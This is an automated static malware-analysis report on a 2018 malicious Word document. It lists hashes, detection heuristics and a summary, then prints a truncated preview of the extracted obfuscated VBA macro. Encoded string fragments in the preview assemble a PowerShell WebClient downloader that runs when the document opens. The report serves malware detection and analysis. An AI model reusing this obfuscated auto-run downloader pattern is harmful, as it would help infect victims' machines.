Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 566372792b34496b…

MALICIOUS

Office (OLE)

150.5 KB Created: 2018-02-16 23:28:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 0916f46aeaa0d45890637aa42659fc11 SHA-1: f7c586a8a836c797bee4bc81d067164a8e68337b SHA-256: 566372792b34496b81f940e1c68a4977161ba4ce7a4b9b16bc18e3a0e8196fea
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicating an intent to execute arbitrary commands. The obfuscated script attempts to construct a command string that includes 'system' and 'net.WebClient', suggesting it's designed to download and execute a second-stage payload. The AutoOpen macro further confirms the malicious intent upon opening the document.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32003 bytes
SHA-256: 649e38887c0cd09b479744d71cd0dcb7d3660cf619b7e19d901af666b075a384
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vDVIEtufD"
Function zUKnXOMRMv()
On Error Resume Next
YtqddXtHi = 5367691 + Atn(dRHswYQo) / EGDNtJD - Sgn(ZMUvppNWIwHTnu * Log(jfFOYYnPP)) / (9423971 - WwLoUidoiqH * ncuVocJUb - iThouf)
jqTfNiKIWRd = 4697346 + Atn(zEwITQKUcZqw) / hcIRmiCw - Sgn(GcGMOsGfnwQr * Log(CXfJdLTzkicuB)) / (8278743 - WIAVnKwWC * CSNwls - YoakmcArinW)
cBQkzLiGS = 9581160 + Atn(RMBhIfzvEj) / BcCbs - Sgn(CwmuWN * Log(okfAdIWb)) / (4744177 - opRjoFumU * WjJaY - YkXLivzktYzzRv)
bhahizAIOOc = (lvaDPBNrhmDC) + yHBjksbJKSUgsssd("MwOTcHdmwWKlSTzhwUcInwdxKWOdx+Odphg+phgwg'+'p+wphg+phggpxIOdx+OdxnOdx+OdxvoOdx+Odx6KOdx+OdxWnjFhVSXpjRj", 23, 70)
sQKQAAj = 5240504 + Atn(jmEMqtpjnP) / zVYsvG - Sgn(NnXzVi * Log(atrrozuW)) / (7398812 - ZXPNUwu * wmumdPwzUroG - RZsQzzpzSLa)
ubMINfT = 6735292 + Atn(TXrssqd) / WrZnQct - Sgn(cChfbIwWzVwFm * Log(bTDQvaGczzd)) / (4402406 - hTciVwIpIsDlL * UvXsYapQF - zhSjADkCENQ)
mJHizDTtvvr = 666493 + Atn(mdIiqTaA) / kBmjbFEwERN - Sgn(jniYpEIBjzIQa * Log(OPwzzijUwQzU)) / (5347164 - zIIzpbDpiFB * SzwmsWF - qpzFTiJPqNbVc)
jJLWFnhT = (srICItEaE) + yHBjksbJKSUgsssd("mSW+w'+'gpt6KW) Swgp+wgpOdx+Odxystemwgp+wgpOdx+Odphg+phgwgp+wgpx.NOdx+Odxet.WebCliMDTBZJ", 4, 78)
KwbCMjY = 1379585 + Atn(owRdjlpv) / zjvGJREIIk - Sgn(YtjpAGsov * Log(ldTjsaTN)) / (3188132 - XouMofHaXEAuvk * uSccatBAKMFba - rkvrnzjz)
jbolvzSbEkH = 3847928 + Atn(UwRRr) / riimwHr - Sgn(qDWojAjEhJjT * Log(CHlKv)) / (9667326 - IbbjJvVXso * jtKBjdvP - RQRIkYKo)
sRkjobvbOS = 5174092 + Atn(bDJOcPbmfofMLt) / wZuBXIOfiKrJT - Sgn(kkjwvMPZihlIqQ * Log(oFEYRowPmD)) / (7688393 - XiEkFHm * DwPPjbXuMPPRw - qFmlC)
jPiSOo = (iMkVKYbOkoIIDf) + yHBjksbJKSUgsssd("jzrumVBizQqpipI+Odxwgp+wgp+'+'Odx6Owgp+wgpdx+Odx'+'KWkOdx+Odx6wgp+wgpOdx+OdxKW+6Odx+'+'OdxKWOdx+Ophg+phgdxe-Iphg+phgOdx+OdxteOdx+OdxmAAaXIwbRDwsVRwUdPWm", 16, 117)
ufOasiCtYcQ = 636538 + Atn(nWPTowwTF) / IiEWHhjcTP - Sgn(PNbjBQzuMuh * Log(XFljYGcw)) / (2409974 - cOolShKGnknnYI * mnhAZshaRhRV - LWqQWUlNrPwPjG)
wwCbAWXNz = 1248540 + Atn(djjdwlSvwmCuoX) / BMMvR - Sgn(XREWZuXjkqmbc * Log(zkrAZDvSjRrZ)) / (3921512 - zDXKpDG * cHWrvMNw - TLkGQULW)
nWmhimcQPN = 2675513 + Atn(EhmiAaLmjSblZj) / IkihHjEnBXO - Sgn(FjjLobFCkpc * Log(RjajdnhmD)) / (5072127 - khoFPA * lGmpGFzHnKUiv - HIQXIYJN)
cqBsDUTMdwr = (azjADWXppprqQE) + yHBjksbJKSUgsssd("AkJXtdcin+'wgp+wgpxtSiajYS", 10, 10)
EJlXciMrQ = 4845121 + Atn(iGbkXQKJa) / wdnpicEOkYp - Sgn(opnNTKHziWEbn * Log(ZGjFZSDmktM)) / (6385423 - wabsAinSmzKz * BazbY - CuCwifz)
jLmMmW = 4470131 + Atn(BEtAmWLZGiEtz) / nIWIYQcn - Sgn(UBittc * Log(MBLzRiDJKipBs)) / (9553954 - SDdPpLWa * OOvZzH - SwNRDhCAEF)
VzVzQIorwp = 2412748 + Atn(uaauLAibQdnhpa) / iCniK - Sgn(BXFfj * Log(kBdLkzYj)) / (6148937 - UjZQjMoJjbcd * zQaCutCV - fjwanSC)
wnmwSowRkXU = (bdUjWAWRYfpd) + yHBjksbJKSUgsssd("iwhtTmDLzEONKAszdx)  -RePlaCE  OdxwWROdx,'+'[chAR]92 -CRePlAcEOdxzobOdx,[chAR]96  -CRePlAcE([chAR]83+[chARwgp+ponZZapwa", 17, 95)
tQDTcRjdElw = 853999 + Atn(SFZVGwKiEaOLV) / XETYQa - Sgn(qtHXtkmHvadzPb * Log(PNpzuFDG)) / (3288394 - noGiJuodubM * wNOXbIAl - GhGpFjR)
JDwTUwrzPnB = 6212521 + Atn(nmqnFvjZlfoVU) / EwPblWduGfXjHA - Sgn(EKXzEoacKISrC * Log(UwqmhCspH)) / (6156491 - MsfKQY * jjhURYPLdUET - fbXmjjua)
MPuJEcBc = 9623035 + Atn(ODrns) / vRtjdLWpziRXVY - Sgn(loMikVsaj * Log(NifSRakWQi)) / (550108 - jpUFhnE * XEZcdPi - IZCrKF)
lYkQljCUsKE = (wEoHhfvJzimdTF) + yHBjksbJKSUgsssd("IFwgp-wgp+wgphg+phgpoOd'+'x'+'+Odwgp'+'+wgpxbOdx+Odxjec6'+'KWOdx+Odx+6phg+phgKWt6KOdphg+phgx+OdxW) raOdx+OdxndoOdx+wgp+wgpOdxm;LD9Owgp+wgpdx+OdxY'+'Odx+phg+phgOdxYUOdx+Odx = .(6Odphg+'+'phgx+wgpPBwrNjNOaljfWJMYutvPiKMSGl", 3, 192)
lEJtBBXIMWV = 593369 + Atn(CwaNqfLAiZrP) / FAhWzk - Sgn(CLGzdm * Log(VpwGUniiHGnOJJ)) / (5071487 - wSPdzUnkK * vmrpbkEiq - fSWbbat)
HJwpHdEi = 5106000 + Atn(kawclHjNJzA) / Owwrw - Sgn(RfCKbSPufwnB * Log(bNBZzwKGh
... (truncated)